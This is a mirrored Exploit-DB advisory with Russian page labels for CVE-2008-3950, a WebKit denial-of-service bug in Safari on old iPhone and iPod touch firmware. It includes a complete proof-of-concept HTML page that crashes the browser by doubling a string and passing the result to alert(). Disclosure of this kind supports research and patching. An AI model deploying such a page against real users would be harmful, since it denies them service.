- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 32341
- Проверка EDB
-
- Пройдено
- Автор
- NICOLAS ECONOMOU
- Тип уязвимости
- DOS
- Платформа
- HARDWARE
- CVE
- cve-2008-3950
- Дата публикации
- 2008-09-12
HTML:
source: https://www.securityfocus.com/bid/31061/info
Apple iPhone and iPod touch are prone to a remote denial-of-service vulnerability that occurs in the WebKit library used by the Safari browser.
Remote attackers can exploit this issue to crash the affected browser installed on the devices, denying service to legitimate users.
The following devices and corresponding firmware are affected:
iPhone 1.1.4 and 2.0
iPod touch 1.1.4 and 2.0
<html> <body> <form> <script type="text/javascript" language="JavaScript"> var st = "A"; alert ( "Crashing Safari on iPhone..." ); for ( var d = 1 ; d <= 16 ; d ++ ) { st += st; } alert ( st ); </script> </form> </body> </html>
- Источник
- www.exploit-db.com